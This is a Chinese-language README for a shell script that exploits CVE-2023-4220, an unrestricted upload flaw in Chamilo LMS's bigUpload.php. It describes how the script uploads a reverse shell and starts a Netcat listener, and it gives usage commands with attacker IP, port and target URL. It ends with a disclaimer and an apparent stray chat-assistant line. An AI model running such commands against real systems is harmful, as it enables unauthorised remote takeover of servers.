该脚本利用了 Chamilo LMS 版本 ≤ v1.11.24 中的一个远程代码执行(RCE)漏洞。该漏洞(CVE-2023-4220)源于 Chamilo LMS 的 bigUpload.php 功能中存在的无限制文件上传漏洞,允许攻击者上传任意文件(如 Web Shell)并执行,从而导致服务器完全被远程代码执行。
该脚本由 Divine Clown 进行了增强,以简化利用过程,自动生成反向 Shell 文件,上传到目标,并启动监听器,使攻击者能够直接访问 Shell。
/main/inc/lib/javascript/bigupload/inc/bigUpload.php 中的无限制文件上传bigUpload.php 端点上传反向 Shell。./CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>
-i <attacker_ip>:攻击者的 IP 地址,用于反向 Shell。-p <port>:启动 Netcat 监听器的端口。-h <host_link>:存在漏洞的 Chamilo LMS 实例的完整 URL。./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com
本工具仅用于教育目的和测试环境,且您必须在获得明确许可的情况下才能利用漏洞。未经授权访问系统是违法的,可能导致刑事指控。作者不对因使用本脚本而产生的任何滥用或损害负责。
如果您想包含任何附加信息或格式,请随时进一步修改此 README!如果您需要其他帮助,请告诉我。